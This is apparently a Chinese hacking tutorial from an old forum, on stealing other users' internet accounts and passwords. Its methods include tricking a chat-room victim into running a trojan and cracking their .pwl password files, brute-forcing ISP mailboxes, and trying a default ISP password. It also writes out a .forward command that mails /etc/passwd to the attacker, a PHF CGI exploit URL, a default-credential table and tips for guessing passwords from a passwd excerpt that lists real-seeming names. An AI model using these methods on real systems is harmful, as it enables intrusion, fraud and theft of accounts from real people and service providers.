如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
3 l) d# q5 u1 r8 Q& m+ C方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。8 w3 Q9 b' b! `* t- G
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......- G7 f |! J5 C" T; Z( l3 C+ ?
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。: L" x) M2 Q4 `7 X1 [
提示:先问清你的目标和你是不是在一个城市。5 m; U: U+ a% _! M6 W9 t' I1 _3 A) q: D" W
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。6 N1 e. Y% }' g! p
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。8 @: N# q3 V7 \: F" o
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。
5 T: @/ @3 T. c& j" U/ r% J方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客% h( i1 ]! Y5 x
优点:没什么优点
) Z# O* n9 D$ C I5 t# _缺点:要具体情况具体对待,太麻烦
! W9 B% |/ V( t: T" E提示:平时多多留神。+ t3 g7 a+ e0 j+ c6 p9 R
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
z, P, J. I2 D密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
) ^- L8 A; z$ A. r运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破5 _" I" O, D: R: r. w5 o: \
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。
% w* |0 d* k+ S/ T' o8 Y. t Q优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。 }5 n; e- d8 Q) h3 k
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。& R/ d+ p- k- i' j% m
由于介绍此类的教学文章比较多,我就不班门弄斧了。 ; F2 n6 E' u$ B
6 t7 |/ J6 K" M# Y哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
$ m1 w. c" m# e只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。* A5 r# X& W* _$ C# Z; W! d3 [
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:; I- a _+ `! Y0 {
' u. a' n3 c3 Z, o5 U
------------------------------
( B3 X$ O/ d5 o1 z# @! m, Q% w/ A2 n$ |' x, N% u( ^
XXX,你好(XX是你在表格上填的名字)
* F$ |. x: z% a& V你在XX热线的主页空间已开通% f4 {% C' R4 P) N( z
帐户名:XXX 密码:11$ c, a) \4 g" W2 k
-----------XX热线
7 p3 g+ F5 C8 S& W4 H" ]电话:XXXX-XXXXXXXX5 c7 O, B* ?5 `$ n, C# ]- A
------------------------------
* j: r1 Y' q% G/ h' e
- S* P! A& r8 r$ _: u% B) j好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。 Q- ?7 O- ]- q$ U' d; p. l
开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
9 v& B- S4 ^: j4 c上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!9 I/ f l: f" a* I8 t; {8 O" U
- a3 i. u% z( }3 Y; V8 s
* }8 O" G5 q! X" Z6 {$ L; \
如何获得第一个帐号! s/ [) s* ?- r& B
# S0 i5 g7 ]/ t K" U
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
_' {3 Y E2 t* x8 Z9 M/ u A* ]5 J8 W, w
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。2 i9 D7 v3 W3 ]2 ]( L; r; |
/ X8 K8 Y2 W5 P5 L4 ?
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.
; P$ y/ c9 L9 M! P. z
4 ~$ P6 } ^6 `! p- S h& j3 \$ V- b7 R$ E以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-< , c9 M& U8 W. U+ _9 j2 g
1 t. [5 l& c% h7 }& Y% D, u6 u' G& J0 N# K还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!
3 Z3 n+ {. t' }, P; @) P1 j
. d" Z- R- B. _很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:
8 R* P8 K3 [8 L' g/ K4 A- C9 r2 P8 ~" b8 T
帐号 密码
- O- c" K. s9 m* @, ^0 c----------- ----------------
1 B) x. h* U( {5 P, h9 l& _5 Q, Proot root
: q& ^; W! X/ M; k. H4 x1 Rsys sys/system/bin
5 R3 r6 m- ^+ I+ P6 B7 l- Zbin sys/bin) v" r3 R4 x$ A" i8 y g
mountfsys mountfsys9 ]) K0 c- k9 X: h! i
adm adm. t4 U' Q: R; ^
uucp uucp& i, K o, D N# F) C1 U
nuucp anon
3 `3 Q* X% p. W3 ]# [5 }anon anon
" I/ X9 c( S/ ~' K1 Tuser user" I/ n! P* Z: @ o
games games( B: l+ V& Z4 W. r; j& L
install install
3 y [, U5 z% u. K8 f/ ^reboot 给 "command login" 用的
2 H- f p* _# P. d5 ]4 I! E) Bdemo demo: @& B8 g% y$ Y, c* S0 p7 o( z! X
umountfsys umountfsys+ L) @1 T5 A; A4 Z2 U
sync sync
& G/ @/ ^ }4 C: U6 j% B: ?admin admin" x) b$ H* `. p
guest guest# ~% ~* L! N6 [) h% W: m% p5 Z6 @3 }+ [
daemon daemon* L0 A# ~, q J! P1 P9 f
________________________________________________________________
. @# ^/ [+ S, E: M+ Q2 u! X( z6 G5 a6 x- w& U- g
有些管理员忘记把他们改掉,那你就发财了!
+ h. X# C4 j) `3 O
* U7 ~6 u1 p% c9 b; J另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
Z8 S% N2 z6 ?* p0 w7 d/ Q1 a* v- ]- Y; h, E
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
/ k& t# h0 m9 ^1 P% t$ q( U: R8 Y6 q
.........& t$ y0 f) Y7 v. r; i
d5 Y0 U; ^/ X3 e7 d' F
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
M! M% z6 `; E+ ]$ H: [2 @8 v
$ V* Z! q: u, |qingyuan:x:275:50::/usr/qingyuan:/bin/sh
# D, R5 `# Y4 ]/ R" W8 o4 I) Y
0 Y* T& m7 e( r4 t" Q# khjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
2 J( ~: f; [7 N* K( T* l% n: t6 y; U* ~
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
+ K' Y& I* @) F& p1 u. {# F; }' T$ s) f- g' X% ]
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
|* [, o7 a- j. A5 Q5 J3 M Q: k" I% N7 ?1 x/ A5 n* A1 H
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
- E. C& E1 D5 |( ^* o" h
( f2 ^2 @" Y: i. |2 K+ Ztide:x:301:50:Wang XinYi:/usr/tide:/bin/sh. r. J* w$ u; l) c: P
$ u' o' v5 k, X' C" w............+ a' C$ E7 f/ j6 Q* V
" p+ [! a1 B3 { b# K8 k
这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.
, r3 b2 ^! B- f6 F1 ?0 a g& A+ W4 m- X W9 D' l1 x
如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜." j8 G$ u2 Q4 u! C
, f- f7 s2 ?5 t: Y& x% m当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的./ `8 c0 x' t% C6 w0 D2 V
$ J/ c- m( O( |. L3 e如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.
\' \5 F1 r9 }5 O" R
1 d) `, C: c5 S B" T8 c最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.2 W3 v, D4 C5 b& o2 E
7 f; u8 a! `2 ~0 p9 k7 C/ K你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我." n' z6 f5 f/ V2 H* J
, A/ s1 E' t8 {* G& W3 Z: E$ G
|